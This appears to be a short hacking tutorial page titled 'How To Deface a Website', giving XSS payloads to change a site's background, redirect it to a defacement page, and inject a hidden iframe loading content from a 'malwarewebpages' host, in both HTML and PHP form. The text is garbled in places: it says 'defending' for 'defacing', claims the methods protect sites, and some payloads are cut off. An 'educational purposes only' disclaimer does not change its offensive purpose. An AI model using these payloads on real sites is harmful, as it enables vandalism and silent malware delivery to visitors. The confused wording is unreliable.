How To Deface a Website ?

Deface a Website With Cross Site Scripting

it will work on sites with an XSS vulnerability.

Defending is one of the most common cases where a hacker finds a vulnerability on a website.

Defacing changes the content of the site to hackers.

In most cases, an attacker uses this method to report a vulnerability to an administrator.

But that’s a bad idea ..!

Here are some of the easiest ways to protect websites from XSS vulnerabilities.

1. Change The Background Color Of a Website


use this in your target website like<script&...y.bgColor="red";</script>

2. Change The Background Image Of A Website


3. Defacement Page

First Of All Upload The Distorted (HTML) Page To And Get The Link.

When You Find A Vulnerable XSS Site, Paste The Script.


This script will redirect the page to the pastehtml error page.

You can only remove persistent vulnerable XSS sites.

4. Defacing with iframe Injection

<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages :

echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;


These Are Some Of The Simple Methods To Deface An XSS-affected Page.

This Will Be For Beginners. However, There Are Other Ways To Screw Things Up.

Never Use This Technique. This Is For Educational Purposes Only. We Are Not Responsible For Any Incorrect Use. Try Your Own Risk.

Warning ! ! !
All The Information Provided Here Is For Educational Purposes Only.
You Are Solely Responsible For What You Do With This Information.

Download As PDF

Print This Page

Join Us On Telegram
Join Us On Telegram